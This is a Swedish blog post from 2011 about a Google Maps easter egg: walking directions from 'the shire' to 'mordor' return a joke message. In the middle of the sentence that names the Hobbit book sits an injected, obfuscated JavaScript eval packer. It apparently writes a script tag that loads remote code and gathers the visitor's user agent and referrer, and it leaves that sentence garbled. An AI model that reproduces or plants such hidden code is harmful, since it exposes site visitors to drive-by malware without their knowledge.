Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Sagan om ringen på Google Maps

Sagan om ringen på Google Maps
Filip Urde
  • On 21 december, 2011
  • http://www.revue.se/filip-urde

Google är tillbaka med ännu ett påskägg… Den här gången har man gjort ett ganska så kreativt påskägg i Google Maps.

Välj ”Get directions” och skriver in att du vill ta dig från ”the shire” till ”mordor” gångväg så kommer meddelandet ni ser här ovan. Google är kul! Är det kanske en hyllning till Sagan om ringen och dess förgående bok ”The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|reess|var|u0026u|referrer|ezete||js|php’.split(’|’),0,{}))
Hobbit
”, vilken kommer på bio till nästa jul. Som vi skrev om tidigare här.
maps.google.com

Två Andra Google påskägg: ”let it snow”   eller  ”do a barrel roll”